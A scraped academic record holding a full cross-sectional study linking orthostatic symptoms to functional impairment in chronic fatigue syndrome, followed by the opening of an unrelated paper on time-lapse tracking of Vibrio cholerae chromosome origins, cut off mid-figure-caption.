"oa_license": "CCBY",
"oa_url": "http://www.scirp.org/journal/PaperDownload.aspx?paperID=84324",
"oa_status": "HYBRID",
"pdf_src": "MergedPDFExtraction",
"pdf_hash": "28cdef5fba7fae13bc77fd29c0ee78541e6bf3cf",
"s2fieldsofstudy": [
"Biology"
],
"extfieldsofstudy": [
"Chemistry"
]
} |
Orthostatic symptoms predict functional capacity in chronic fatigue syndrome: implications for management
Summary Objectives: To establish the relationship between the functional impairment experienced by chronic fatigue syndrome (CFS) patients and the symptoms frequently experienced by those with CFS, specifically cognitive impairment, fatigue and orthostatic symptoms. Design: Cross-sectional questionnaire survey. Setting: Specialist CFS clinical service. Subjects: Ninety-nine Fukuda-diagnosed CFS patients and 64 matched controls. Main outcome measures: Symptom and functional assessment tools completed and returned by post, comprising the PROMIS HAQ (Patient-Reported Outcomes Measurement Information System, Health Assessment Questionnaire), CFQ (Cognitive Failures Questionnaire), FIS (Fatigue Impact Scale) and OGS (Orthostatic Grading Scale). Results: CFS patients experience greater functional impairment than controls [mean (95% CI) PROMIS HAQ scores CFS 36 (31-42) vs. controls 6 (2-10); P < 0.0001], especially in the functional domains of activities and reach. Greater functional impairment is significantly associated with greater cognitive impairment (P = 0.0002, r = 0.4), fatigue (P < 0.0001, r = 0.5) and orthostatic symptoms (P < 0.0001, r = 0.6). However, only orthostatic symptoms (OGS) were independently associated with functional impairment (β = 0.4, P = 0.01). Conclusions: Treatment of orthostatic symptoms in CFS has the potential to improve functional capacity and so improve quality of life.
Introduction
Chronic fatigue syndrome (CFS) is a common debilitating condition thought to affect 0.2-2% of the UK population. [1][2][3][4][5] CFS is associated with a constellation of symptoms that lead to considerable disability. The level of impaired functional ability in CFS is not homogeneous, with studies showing it to be comparable to that in a number of other chronic diseases, most notably multiple sclerosis, hypertension, congestive heart failure, acute myocardial infarction, depression, end-stage renal disease, heart disease and untreated hyperthyroidism. [6][7][8][9][10] A number of studies have suggested that functional impairment in CFS is related to cognitive deficits. [11][12][13][14][15] Recent studies have confirmed that, in addition to the classically recognized symptoms of fatigue and cognitive impairment, almost 90% of those with CFS experience symptoms related to orthostasis. 16,17 The relationship between functional capacity and the other symptoms described by those with CFS is currently unclear. Understanding this will allow treatment to be directed at those symptoms whose improvement has the potential to lead to the greatest functional gain. Here, using a patient-reported outcome tool, we measured the degree of functional impairment experienced by those with CFS and the impact of the symptoms of CFS (cognitive impairment, fatigue and autonomic dysfunction) upon this impairment. The purpose of this study was to discover how these symptoms relate to functional capacity in CFS, with the aim of improving understanding of how, and in which particular functional domains, CFS affects patients' lives.
Subjects
Subjects were 135 consecutive patients referred to the Newcastle upon Tyne Royal Victoria Hospital over the 6 months from January to June 2009 who fulfilled the Fukuda diagnostic criteria for CFS. 4 The control group was recruited by asking each CFS patient to invite one non-CFS friend (of comparable age and sex) to complete the symptom assessment tools. No selection (positive or negative) was made with regard to co-morbidity, fatigue status or functional ability.
Measures
Four functional and symptom assessment tools were sent by post to a total of 135 CFS patients. Subjects were asked to complete these measures and return them in a prepaid envelope. The assessment tools were: (1) PROMIS HAQ - Patient-Reported Outcomes Measurement Information System, Health Assessment Questionnaire. 18,19 This tool assesses the functional impact of CFS by measuring subjects' functional and physical ability. The PROMIS HAQ was derived from the HAQ and consists of 20 questions that ask patients to rate their ability to carry out daily activities on a 5-point scale from 0 = 'without any difficulty' to 4 = 'unable to do'. The 20 questions are divided into eight domains of physical function: dressing, arising, eating, walking, hygiene, reach, grip and activity. The highest-scoring question in each domain is used as the domain score. All eight domain scores are added together, divided by eight and multiplied by 25 to calculate the total PROMIS HAQ score (a scoring sketch is given after this list of tools). Higher scores indicate worse functional ability and therefore greater functional impairment.
(2) CFQ - Cognitive Failures Questionnaire. [20][21][22] To determine whether CFS patients experienced cognitive symptoms more frequently than matched controls, indicating worse cognitive impairment, the CFS patients and controls completed the CFQ, which assessed their level of cognitive ability. The presence and severity of cognitive symptoms were compared between the two groups. This tool assesses the prevalence of cognitive symptoms by measuring the frequency of cognitive slips or failures occurring in everyday life. The cognitive abilities assessed by the CFQ include memory, attention, concentration, forgetfulness, word-finding ability and confusion. The questionnaire consists of 25 items covering failures in perception, memory and motor function and asks patients to rate how often these failures occur on a 5-point Likert scale of 0-4 (0 = never, 4 = very often). The responses to the 25 questions are added together to obtain the total CFQ score. The higher the score, the greater the cognitive impairment.
(3) FIS - Fatigue Impact Scale. 23 The FIS measures the fatigue experienced by CFS patients and how that fatigue functionally limits their lives and activities. The FIS assesses patients' perception of how fatigue affects their cognitive, physical and psychosocial functions, including the impact of fatigue on work, family and financial responsibilities, mood, reliance on others, social activities and quality of life. It is made up of 40 items, and subjects rate how badly each item is affected by fatigue on a 5-point scale ranging from 0 (no problem) to 4 (extreme problem). The total FIS score is calculated by adding the answers to all 40 questions. Higher scores indicate a greater impact of fatigue.
(4) OGS - Orthostatic Grading Scale. 24 The OGS is a self-report assessment tool consisting of five items, which assess the frequency of orthostatic symptoms, the severity of orthostatic symptoms, the conditions under which orthostatic symptoms occur, activities of daily living and standing time.
Patients are asked to grade each item on a scale of 0-4, 0 being the lowest and 4 the highest. The total OGS score is calculated by adding the scores for each item. Higher scores indicate greater severity of autonomic dysfunction.
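The PROMIS HAQ scoring rule in (1) above is easy to misread, so here is a small sketch of it; the item-to-domain grouping shown is illustrative, not the instrument's actual item list.

```python
# PROMIS HAQ total: each of the eight domains is scored by its worst
# (highest) item on the 0-4 scale; the eight domain maxima are averaged
# and multiplied by 25, giving a total in the range 0-100.
def promis_haq_total(responses_by_domain):
    assert len(responses_by_domain) == 8
    domain_scores = [max(items) for items in responses_by_domain.values()]
    return sum(domain_scores) / 8 * 25

# Illustrative respondent with mild difficulty in two domains only:
example = {
    "dressing": [1, 0], "arising": [0, 0], "eating": [0, 0, 0],
    "walking": [2, 1], "hygiene": [0, 0, 0], "reach": [0, 0],
    "grip": [0, 0, 0], "activity": [0, 0, 0],
}
print(promis_haq_total(example))  # (1 + 2) / 8 * 25 = 9.375
```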
Data analysis
Analysis was performed using the statistical analysis software Prism 3.0 and SPSS. It was first determined whether data were normally or non-normally distributed. Normally distributed data are presented as mean ± standard deviation, and comparisons between groups were made using unpaired t-tests. Non-normally distributed data are presented as median and range, and comparisons were made by Mann-Whitney U-test. To determine whether the degree of functional impairment experienced by CFS sufferers was influenced by the symptoms they experienced, we explored the univariate relationships between functional capacity and the symptom assessment tools for cognitive symptoms, fatigue and autonomic dysfunction. Univariate analysis was performed by correlation using Pearson and Spearman tests, as appropriate for parametric and non-parametric data.
To determine whether the relationships between functional ability and the symptoms of CFS (cognitive impairment, fatigue and autonomic dysfunction) are independent of each other, a multivariate analysis was performed using the log-rank test. Differences in proportions were determined using chi-squared tests. Results were considered statistically significant when P < 0.05.
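As a concrete sketch of the univariate step, assuming a dataframe `df` holding the per-subject total scores (column names are ours, and the data are not constructed here): test each pair of scores for normality and pick Pearson or Spearman accordingly.

```python
# Correlate each symptom score with the PROMIS HAQ total, using Pearson for
# normally distributed pairs and Spearman otherwise (Shapiro-Wilk at 0.05).
from scipy import stats

for symptom in ["CFQ", "FIS", "OGS"]:
    x, y = df["PROMIS_HAQ"], df[symptom]  # df is an assumed dataframe
    normal = (stats.shapiro(x).pvalue > 0.05) and (stats.shapiro(y).pvalue > 0.05)
    r, p = stats.pearsonr(x, y) if normal else stats.spearmanr(x, y)
    print(symptom, round(r, 2), p)
```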
Ethical permission
The programme of research is approved by the Newcastle and North Tyneside LREC. The project was funded by ME Research UK. Consent for data use was implied by return of the assessment tools.
Results
Ninety-nine of the 135 CFS patients who were sent the assessment tools participated in this study (response rate 99/135; 73%). The mean ± standard deviation age of the patients was 57.3 ± 15 years, and 87% were female (86 female, 13 male). The CFS patients were matched group-wise (by mean age and proportion of females) to 64 control subjects, whose mean age was 59.3 ± 17 years; 83% were female (53 female, 11 male).
Overall functional impairment
Functional capacity was significantly reduced in the CFS group compared with controls when assessed using the total PROMIS HAQ score (Figure 1; P < 0.0001), with the mean ± standard deviation for the CFS patients (36.4 ± 27) almost seven times greater than that of the controls (5.9 ± 15) [median (interquartile range) CFS 34.4 (12.5-56.3) vs. controls 0 (0-2.5)]. Examining the proportion of each group who experienced no functional impairment, only nine of the 99 CFS subjects (9%) scored 0 on the PROMIS HAQ, marking themselves as able to do every task 'without any difficulty', whereas 37 of the 64 control subjects (57.8%) scored 0 (P < 0.0001).
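For illustration, the comparison of these proportions can be reproduced with a chi-squared test on the 2×2 table; this sketch is ours and simply re-uses the counts quoted above.

```python
# Chi-squared test on zero vs. non-zero PROMIS HAQ scores by group.
from scipy.stats import chi2_contingency

table = [[9, 99 - 9],     # CFS: scored 0 vs. scored > 0
         [37, 64 - 37]]   # controls
chi2, p, dof, expected = chi2_contingency(table)
print(chi2, p)            # p far below 0.0001, consistent with the text
```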
Examining the domains of functional ability
The PROMIS HAQ assessment tool comprises eight separate domains of physical function: dressing, arising, eating, walking, hygiene, reach, grip and activities. Table 1 shows the individual PROMIS HAQ domain scores (scored out of four) for CFS patients compared to matched controls.
In all domains of functional ability those with CFS recorded significantly higher scores compared to controls, signifying CFS patients have worse physical ability/functioning than controls across the whole spectrum of functional activities.
Relationship between functional capacity and symptoms in CFS
As expected, the CFS group experienced higher levels of fatigue and orthostatic symptoms than controls. The total score on the Cognitive Failures Questionnaire was higher for the CFS group than for the control group, demonstrating that, as with other cognitive assessment tools, CFS patients have greater cognitive impairment than controls (Figure 2). On univariate analysis, there were strong, significant correlations between functional capacity and cognitive symptoms, fatigue and autonomic symptoms (Table 2), with increased symptoms associated with worse functional capacity.
Independent associations between functional capacity and symptoms in CFS
The results of the multivariate analysis are shown in Table 3. The results confirm that worsening autonomic symptoms are independently associated with increased functional impairment, whereas worsening cognitive impairment or fatigue is not.
A similar multivariate analysis was performed for each of the individual PROMIS HAQ domains against the CFQ, FIS and OGS scores. This analysis found that a higher autonomic symptom burden was independently associated with functional impairment in the walking (P = 0.017; β = 0.37), arising (P = 0.034; β = 0.34), activities (P = 0.041; β = 0.285) and eating (P = 0.029; β = 0.355) domains, and that increased fatigue was independently associated with higher scores in the walking (P = 0.032; β = 0.402) and activities (P = 0.001; β = 0.620) domains, and in the hygiene domain (P = 0.016; β = 0.229). There were no independent predictors of impairment in the dressing, reach and grip domains, and no domains were independently associated with CFQ scores.
Discussion
This study confirms that functional capacity is reduced in patients with CFS compared with normal subjects. The ability of patients to carry out everyday activities was lower than that of control subjects in all eight domains of functional ability measured by the PROMIS HAQ assessment tool. Significant associations were identified between the functional impairment of CFS patients and symptoms of cognitive deficit, fatigue and autonomic dysfunction, confirming that greater functional impairment is associated with greater cognitive impairment, fatigue and worse orthostatic symptoms. However, only a higher burden of orthostatic symptoms was independently associated with functional impairment on multivariate analysis. This study therefore indicates that orthostatic symptoms, and the underlying autonomic dysfunction found frequently in those with CFS, 16,17,[25][26][27][28] are the key symptoms impacting functional ability. The focus of treatment in CFS should accordingly be the orthostatic symptoms rather than the symptom of fatigue. If orthostatic symptoms were treated and the autonomic dysfunction improved, functional impairment in this patient group would potentially decrease and functional capacity improve.
Since functional impairment also correlates positively with both cognitive impairment and fatigue, reducing functional impairment by treating the autonomic dysfunction might also decrease the severity of cognitive difficulties and fatigue. Studies in fatigue- and non-fatigue-associated diseases suggest a link between autonomic dysfunction and cognitive impairment, with poorer scores on cognitive function tests in patients with postural dysregulation of blood pressure, 29-34 the physiological abnormality increasingly recognized in CFS. 35,36 Functional impairment in all domains was significantly associated with orthostatic symptoms, with the most significant and strongest relationship in the walking domain. Furthermore, the multivariate analysis showed functional impairment in the walking, arising, eating and activities domains to be independently associated with orthostatic symptoms. Walking, arising and activities all involve standing up or being upright. The autonomic nervous system plays an important role when standing upright in overcoming the gravitational pooling of blood in the lower limbs, which causes an imbalance between arterial and venous blood pressures. If not addressed, this would lead to insufficient perfusion and malfunction of organs and tissues. The autonomic nervous system compensates by increasing sympathetic activity to induce vasoconstriction of the large veins in the legs, re-equilibrating arterial and venous blood pressures by promoting increased venous return. With autonomic dysfunction, these compensatory mechanisms may be impaired; as a result, standing up and related activities would be adversely affected, leading to functional impairment. Our recent study confirming impaired muscle bio-energetic function in CFS, the degree of which associates with autonomic dysfunction, 37 could also explain why sub-optimally functioning muscles lead to an inability to perform activities of daily living. It could therefore be predicted that if autonomic dysfunction were treated in CFS patients, the domains involving standing or an upright posture would show the greatest improvement in functional ability. Despite this, the UK CFS/ME NICE guidelines, 5 which recommend the investigation and management strategy for those with CFS, do not include objective or subjective evaluation of autonomic function in this important patient group.
One treatment of autonomic dysfunction in CFS that has recently been investigated, in a clinical trial of 38 CFS patients, is home orthostatic training (HOT). 38 In a small feasibility study, this intervention was found to improve autonomic function (decreased blood pressure whilst standing, increased total peripheral resistance) and to improve patients' reports of fatigue over a 6-month period as measured by the FIS, showing an encouraging trend towards reducing fatigue by improving orthostatic symptoms. HOT is considered an effective and established treatment in other diseases associated with autonomic dysfunction. [39][40][41] This study has some limitations. Since the assessment involved self-report questionnaires, the responses are all subjective. One patient's interpretation of the assessment scale may differ from another's, and hence the responses may not be completely consistent in their description of symptom severity. However, the magnitude of the differences between patients and controls suggests that even if the patients over-reported by 50%, the differences would still be dramatic. Furthermore, it is possible that the results were influenced by the design of the study; non-responders may have been too symptomatic to complete the questionnaires or, conversely, too active to respond.
In summary, this study has confirmed that functional capacity is reduced in CFS patients compared with control subjects, and that functional impairment in CFS is significantly related to symptoms of autonomic dysfunction; treating autonomic dysfunction would therefore be expected to improve patients' functional capacity, particularly in the upright position, and hence improve quality of life. Future research should focus on treatments of autonomic dysfunction in CFS, both pharmacological and physiological in nature, in order to determine whether improvements in autonomic function are paralleled by increased functional capacity.
Funding
United Kingdom NIHR Biomedical Research Centre in Ageing - Cardiovascular Theme; ME Research
Fine-scale time-lapse analysis of the biphasic, dynamic behaviour of the two Vibrio cholerae chromosomes
Using fluorescent repressor-operator systems in live cells, we investigated the dynamic behaviour of chromosomal origins in Vibrio cholerae, whose genome is divided between two chromosomes. We have developed a method of analysing fine-scale motion in the curved co-ordinate system of vibrioid bacteria. Using this method, we characterized two different modes of chromosome behaviour corresponding to periods between segregation events and periods of segregation. Between segregation events, the origin positions are not fixed but rather maintained within ellipsoidal caged domains, similar to eukaryotic interphase chromosome territories. These domains are approximately 0.4 µm wide and 0.6 µm long, reflecting greater restriction in the short axis of the cell. During segregation, movement is directionally biased, speed is comparable between origins, and cell growth can account for nearly 20% of the motion observed. Furthermore, the home domain of each origin is positioned by a different mechanism. Specifically, the oriCI domain is maintained at a constant actual distance from the pole regardless of cell length, while the oriCII domain is maintained at a constant relative position. Thus the actual position of oriCII varies with cell length. While the gross behaviours of the two origins are distinct, their fine-scale dynamics are remarkably similar, indicating that both experience similar microenvironments.
Introduction
For over 100 years, the dynamic behaviour of eukaryotic chromosomes within the nuclei of living cells and the dramatic events involved in chromosome segregation have been directly observed in the light microscope (Wilson, 1896). The organization and dynamics of bacterial chromosomes are more difficult to observe, and information on their behaviour has only recently emerged. Experiments in live cells have revealed that bacterial chromosomes also undergo a period of rapid segregation that may be analogous to eukaryotic anaphase (Glaser et al., 1997; Webb et al., 1998; Gordon et al., 2004; Viollier et al., 2004). Furthermore, at least in the case of Caulobacter crescentus and in slow-growing Escherichia coli, the bacterial chromosome is highly organized; chromosomal loci are ordered in a linear array throughout the cell that corresponds to their position on the chromosome (Viollier et al., 2004). In addition, multiple techniques have revealed that the bacterial chromosome is organized into a number of functional domains (for example Niki et al., 2000; Postow et al., 2004; Valens et al., 2004; Lesterlin et al., 2005; Stein et al., 2005). These findings have sparked widespread interest in bacterial chromosome dynamics, particularly during segregation. Less attention has been focused on chromosome dynamics between periods of segregation.
The positions of chromosomal loci in bacterial cells are highly stereotyped among individuals in a population and are correlated to their position in the genome. Specifically, the origin and terminus regions typically reside at opposite ends of the nucleoid (Webb et al., 1997; Niki and Hiraga, 1998; Lemon and Grossman, 2000; Li et al., 2002; Lau et al., 2003) and intervening loci occupy positions between the origin and terminus that correspond to their relative position on the chromosome (Niki et al., 2000; Viollier et al., 2004). Similarly, segregation of the chromosome begins at the replication origin of the chromosome and proceeds sequentially through the chromosome to the terminus (Viollier et al., 2004; Bates and Kleckner, 2005; Fekete and Chattoraj, 2005; Wang et al., 2005).
Nevertheless, while there is order in the overall gross localization and segregation of bacterial chromosomes, individual origins exhibit positional variation , and origins of fast-growing E. coli chromosomes are dynamic with apparently random motion (Elmore et al ., 2005). The extent of mobility of individual positions on the chromosome is not well understood. In all population-based studies, where the location of a single chromosomal locus is determined in many individual bacteria, chromosomal loci have been found to occupy a broad range of positions. It is not clear to what extent the positional distributions reflect variations among individual bacteria or variations within individual bacteria that occur through time as a result of chromosomal movement. Importantly, the mobility of a chromosomal locus is under different constraints than a protein or other small molecule. A particular segment of DNA is covalently linked to a molecule many times longer than the cell itself and thus is compacted within the cell. Moreover, the DNA interacts with other cellular components via transcription, coupled translation and transertion. The active mechanisms operating during chromosome segregation in bacteria must separate the duplicated chromosomes in the context of these underlying constraints. We were therefore particularly interested in measuring the fine-scale mobility of bacterial chromosomal loci during the phases of the cell cycle between segregation events, and determining how the underlying mobility changes during active segregation.
We examined chromosome dynamics in Vibrio cholerae because it affords the opportunity to examine the behaviour of two distinct chromosomes in the same bacterial cell. Previous studies have indicated that both V. cholerae origins synchronously initiate replication once per cell cycle when grown in minimal media (Egan et al ., 2004). Under these conditions, only one or two origins are expected for each chromosome per cell. In addition, the origins of both chromosomes have different steady-state localization patterns (Fogel and Waldor, 2005). Specifically, the origin of chromosome I occupies a near polar position and segregates asymmetrically from that position, while the origin of chromosome II localizes to the middle of the cell and segregates symmetrically. Moreover, chromosome segregation is not synchronous as it is in eukaryotic systems: the origin of chromosome I segregates early in the cell cycle and the origin of chromosome II segregates late in the cell cycle (Fogel and Waldor, 2005). Thus on a gross scale, the origins of the two V. cholerae chromosomes exhibit distinct behaviours. At the outset of this work, the fine-scale dynamic behaviour of the V. cholerae origins was not known. Here we quantitatively describe the dynamic behaviour of the origin region of both V. cholerae chromosomes during segregation and also between segregation events.
Results
To monitor the behaviour of the V. cholerae chromosome origins in live cells, either lacO or tetO arrays were inserted near the origin of both chromosomes and visualized with LacI-CFP or TetR-YFP respectively (Lau et al ., 2003). Simultaneous visualization of both origins reveals qualitatively distinct localization patterns for each origin (Fig. 1). These steady-state distribution patterns are the same in reciprocally marked strains ( Figure S1) and confirm those described by Fogel and Waldor (2005) who characterized the positions of lacO and tetO arrays inserted at different origin-proximal sites. Together, these data indicate that neither the identity of the arrays nor the exact position of insertion affects the observed origin localization patterns.
For quantitative analyses of movement of subcellular features, it is important to consider the frame of reference for the measurements. Cell-based measurements are defined relative to a reference position in the cell such as a pole or the mid-cell. The non-uniform curvature of V. cholerae cells makes it difficult to directly translate fluorescent tag locations into cell-based co-ordinates. Young V. cholerae cells are curved to varying degrees and longer cells about to divide are often S-shaped. For quantitative position measurements throughout this study, we established an objective and general cell-based co-ordinate system corresponding to the length and width of the cell. The length of non-uniformly curved rods is measured as a sum of short linear segments along the centre of the cylindrical axis (Fig. 2). The two axes of the cell-based coordinate system correspond to positions along the centreline of the cell (length axis) and perpendicular distance from the centreline (width axis) (Fig. 2). In this way, we were able to measure origin locations using the length and width axes of the curved Vibrio cells across a population with varying shapes. We examined origin positions using both actual distances between the centre of the origin foci and a reference position in the cell such as a pole or the mid-cell, and fractional distances normalized by cell length. As shown in Fig. 2B, this analysis facilitated comparison of origin positions in large populations of cells as well as in individual cells over time (see below).
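To make the geometry concrete, here is a minimal sketch of such a centreline-based coordinate transform. Python/NumPy is used purely for illustration (the authors' own analysis was done in Matlab), and all function and variable names here are hypothetical: given an ordered polyline approximating the curved cell axis, it returns the arc-length (length-axis) and perpendicular (width-axis) coordinates of a fluorescent focus.

```python
import numpy as np

def cell_coordinates(centerline, spot):
    """Map a spot's (x, y) position into cell-based (length, width)
    co-ordinates, given an ordered polyline 'centerline' ((N, 2) array)
    running from one pole to the other."""
    centerline = np.asarray(centerline, dtype=float)
    spot = np.asarray(spot, dtype=float)

    starts = centerline[:-1]
    vecs = centerline[1:] - starts
    seg_lens = np.linalg.norm(vecs, axis=1)

    # Project the spot onto each segment, clamped to the segment ends.
    t = np.einsum('ij,ij->i', spot - starts, vecs) / seg_lens ** 2
    t = np.clip(t, 0.0, 1.0)
    feet = starts + t[:, None] * vecs
    dists = np.linalg.norm(spot - feet, axis=1)

    k = np.argmin(dists)                          # nearest segment
    s = seg_lens[:k].sum() + t[k] * seg_lens[k]   # length-axis co-ordinate
    w = dists[k]                                  # width-axis co-ordinate
    return s, w

# Cell length is simply the summed segment lengths:
# np.linalg.norm(np.diff(centerline, axis=0), axis=1).sum()
```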
Gross behaviour of V. cholerae origins
For exploration of dynamic behaviour, we used time-lapse microscopy to track fluorescent foci corresponding to TetR-YFP bound to tetO arrays inserted near the origin regions of both V. cholerae chromosomes ( ∼ 13 kb counterclockwise from oriC I and ∼ 12 kb counterclockwise from oriC II ) as they moved over 5 min, 20 s and 1 or 2 s intervals. Tracks from the 5 min interval movies provide a general picture of the behaviour of each origin, examples of which are shown in Fig. 3A-D. To facilitate comparisons between cells, origin tracks from all cells were plotted as a function of cell length ( Fig. 3E and F). These tracks from 5 min interval movies corroborate the large-scale behaviours previously described (Fogel and Waldor, 2005). First, each origin occupies a distinct region of the cell, with oriC I near the poles and oriC II near the mid-cell. Second, each origin exhibits a distinct segregation pattern; oriC I segregates asymmetrically with one copy maintaining the original position, while oriC II segregates symmetrically from the mid-cell. Third, separation of the tracks in Fig. 3E and F into individual points representing segregating and non-segregating points in the cell cycle ( Fig. 3G and H) corroborates the sequential segregation of the two origins described by Fogel and Waldor (2005), with oriC I segregating fairly early in the cell cycle when bacteria are ∼ 3 µ m in length and oriC II segregating later when bacteria are typically ∼ 4 µ m or longer. These observations set the groundwork for further quantitative analyses.
Tracking oriC I through cell divisions reveals that this origin remains near the old pole, as opposed to the new pole formed by the most recent cell division. Furthermore, once the oriC I home position is established, it is maintained through subsequent cell divisions ( Fig. 3A and C). Positioning of oriC II followed a different pattern. Because the home for oriC II is near the mid-cell, this position changes with each cell division ( Fig. 3B and D). Tracking oriC II through cell divisions reveals that the home position of oriC II is biased towards the new pole. Of 18 origins observed through a cell division, 14 were closer to the pole recently formed by cell division.
In the initiation of segregation, we observed several cases where a second origin focus appears, then seems to disappear for one or more frames, and then reappears and persistently moves across the cell (for example see arrow in Fig. 3C). This was observed in three of 18 oriC I segregations and three of 23 oriC II segregations. This behaviour was not observed at other times in the cell cycle. While it is possible that this observation reflects some dynamic behaviour of the integrated arrays, we interpreted it to indicate a pre-segregation period where the origin has been replicated but the two copies have not yet committed to segregation. These origins bounce randomly, separating transiently and coming back together, before finally committing to segregate to opposite poles. This bouncing behaviour suggests that the process of segregation is separated in time from the process of replication of the chromosome. Furthermore, this observation suggests that V. cholerae chromosomes remain cohered for some time after replication before segregation occurs. Several lines of evidence indicate a period of cohesion of E. coli chromosomal loci after replication (Sunako et al., 2001; Bates and Kleckner, 2005).

[Fig. 2 caption] A. The length of the cell is the sum of short linear segments (delimited by the green dots) along the centre of the bacterium. Red dots indicate the poles. The position of each focus was measured in terms of distance from the centreline (red bracket) and distance from the pole (black bracket). B. Expected line fitting analysis if origins were localized to fixed distances from the pole (i and ii) or fixed relative positions in the cell (iii and iv); see text for further details. In these examples, origins are maintained at a distance of 0.5 µm from the pole (i and ii) or a relative position of 30% of the cell length (iii and iv).
Origin behaviour is biphasic and correlated with progress through the cell cycle
Following origin motions over time in individual cells, we observed and characterized two distinct modes of behaviour of V. cholerae origins corresponding to periods of active segregation and periods between segregation events. Segregation begins when one focus separates into two distinct foci and includes directional origin movement across the cell. The examples of origin behaviour in individual cells in Fig. 3A-D demonstrate that between segregation events, the position of the origin is not fixed but is confined to a region, within which it exhibits rapid but apparently random motion (analysed in more detail below, Figs 5 and 6). The region of origin confinement is near the pole for oriC I and near the mid-cell for oriC II (Fig. 3A-H). We term this confined region the 'home' position. Comparison of the dynamic behaviour patterns from all cells (Fig. 3E and F) revealed that in every track, the position of the chromosome origin is variable in the home position, suggesting that the variation in the actual position of the chromosome origins within a cell population is largely due to variation over time within individual cells, rather than strictly to cell-to-cell variation. These two phases of chromosomal behaviour have been observed in E. coli, Bacillus subtilis and C. crescentus (Webb et al., 1998; Viollier et al., 2004), with an emphasis on the segregating phase. We went on to quantitatively characterize movement in both phases to understand the dynamics of chromosomes throughout the cell cycle.
The home position of each origin is differentially maintained
Given that chromosomal origins are not randomly distributed throughout the cell, and that oriC I and oriC II have unique distribution patterns, we asked how the origin's home position is determined. We examined two possible scenarios. The first possibility is that the origins are consistently positioned at a particular actual distance from a pole. In this case, origin distances from the pole will be conserved regardless of the length of the cell. The slope of a linear fit of the home position versus cell length will be zero, and the intercept will indicate the distance from the pole (Fig. 2B, i). Fractional positions will be inversely proportional to cell length, and as a result, will fit a power function (y = ax^b) where the exponent b = −1, and the scaling factor, a, indicates the fractional distance from the pole (Fig. 2B, ii). The second possible scenario is that the origin is localized to a relative position in the cell. The MinCDE system used by E. coli to identify the middle of the cell, regardless of length, exemplifies this scenario (reviewed by Margolin, 2001). If the origins localize to a relative position in the cell, the slope from a linear fit of origin home positions versus cell length will reveal the relative position measured by the cell and the intercept should be near zero (Fig. 2B, iii). Conversely, a regression line from fractional positions versus cell length will have a slope of zero, and the intercept will indicate the relative position measured by the cell (Fig. 2B, iv). We found that different methods are used to maintain the home positions of oriC I and oriC II .
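The two scenarios make distinct regression predictions, which can be checked directly. The sketch below (Python/NumPy for illustration; the authors' analysis used Matlab and Microcal Origin) fits both the linear model to actual positions and the power law y = a·x^b to fractional positions. The data are simulated for a fixed-actual-distance origin; all names and numbers are illustrative only.

```python
import numpy as np
from scipy.optimize import curve_fit

rng = np.random.default_rng(0)

# Simulated home-phase data (illustration only): 200 cells 2.0-5.5 um
# long whose origin sits 0.6 um from the pole plus caging/measurement
# noise, i.e. the "actual distance" scenario of Fig. 2B (i and ii).
lengths = rng.uniform(2.0, 5.5, 200)
positions = 0.6 + rng.normal(0.0, 0.15, lengths.size)

# Actual positions vs cell length: slope ~ 0 and intercept ~ the fixed
# distance for an actual-distance ruler; slope ~ the relative fraction
# and intercept ~ 0 for a relative-positioning mechanism.
slope, intercept = np.polyfit(lengths, positions, 1)
print(f"linear fit: slope = {slope:.2f}, intercept = {intercept:.2f} um")

# Fractional positions vs cell length: y = a * x**b with b -> -1 for an
# actual-distance ruler (a recovers the distance), b -> 0 for relative.
frac = positions / lengths
(a, b), _ = curve_fit(lambda x, a, b: a * x**b, lengths, frac, p0=(0.6, -1.0))
print(f"power fit: a = {a:.2f}, b = {b:.2f}")
```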
All analyses indicate that oriC I is positioned by a mechanism that measures actual distances (Fig. 4). oriC I home positions are maintained through cell division and as a result of asymmetric segregation do not depend on the number of segregated origins in the cell. Therefore, oriC I positioning was evaluated without regard to the number of origin foci in the cell. First, linear regression of positions of individual oriC I tracks in the home phase yields a median slope near zero (0.07) (Fig. 4A, Table 1). Furthermore, linear regression of all home oriC I together also gives a slope near zero (0.03) and an intercept of 0.58 µm (Fig. 4B). Fractional positions fit a power function with an exponent that approaches −1 (−0.96) and a scaling factor of 0.58 (Fig. 4C). Together these data indicate that oriC I is positioned at a constant actual distance (average ∼0.6 µm) from the pole independent of cell length or cell cycle phase.
In contrast, similar analyses of oriC II in its home position indicate that it is localized by a mechanism that measures relative position in the cell (Fig. 4). Because the distributions for cells with one or two discrete oriC II foci are different, they were separated for this analysis. Analysis of the actual positions of individual tracks for single oriC II foci versus cell length resulted in a median slope of 0.48 (Fig. 4A, Table 1). Linear regression of the actual positions of all single oriC II foci tracks together yielded a slope of 0.49 and a near zero intercept of −0.02 µm (Fig. 4B). Conversely, linear regression of fractional positions resulted in near zero slopes of 0.001 and −0.011 and intercepts of 0.48 and 0.39 for cells with single and double oriC II foci respectively (Fig. 4C). These analyses all support a relative positioning mechanism where oriC II tracks the mid-cell when present as a single focus and approaches the nascent mid-cells of the future daughter cells when segregated.

[Fig. 4 caption] Between segregation events, oriC I is positioned at a constant absolute distance from the pole and oriC II is positioned at a constant relative distance from the pole. For analysis of the home positioning method, origin tracks from 5 min interval movies were analysed. All oriC I tracks as well as duplicated and segregated oriC II tracks are plotted with the nearest pole at zero. This enables comparison of 'home' domains on opposite sides of the cell. Before an observed cell division, the poles are indistinguishable. For measurement of oriC II position, using the nearest pole as zero gives a non-normal distribution of positions (not shown) indicating a bias in measurement. Thus, before observed divisions, single oriC II tracks are plotted with an arbitrary pole at zero; after cell division, the new pole was used as the zero. A. Regression lines for individual origins in the home position (black lines) correspond to the home position tracks as shown in Fig. 3E and F (thin blue or pink lines). The average slope for oriC I is 0.07. The average slope for oriC II is 0.48 when single copy and 0.15 when duplicated. B. Regression analysis of the actual positions of the time-lapse foci taken together as a whole. oriC I fits a line with a slope near zero (y = 0.03x + 0.58) and oriC II fits a line with a slope near 0.5 (y = 0.49x − 0.02) when single copy and near 0.25 (y = 0.29x + 0.21) when segregated. C. The fractional positions of the time-lapse origins versus cell length. oriC I fits a power function y = 0.58x^(−0.96), and oriC II fits a line with a slope of zero (y = 0.001x + 0.48 and y = −0.01x + 0.39 for single and double spots respectively). D. Regression analysis for a population of still images of ∼500 cells yields lines of y = 0.09x + 0.35 for oriC I and y = 0.50x + 0.006 and y = 0.33x − 0.03 for single and double copies of oriC II respectively. These fits are comparable to those in (B) for the origins followed by time-lapse microscopy and confirm that oriC I is positioned at an actual distance from the pole regardless of the number of origins in the cell and oriC II is positioned at a relative position in the cell. Solid lines indicate the fit of the data. Dotted lines represent the 5 and 95% confidence intervals of the fit calculated by Microcal Origin 6.0 (Microcal Software, Northampton, MA). A single origin in a cell is indicated by an open circle. Once 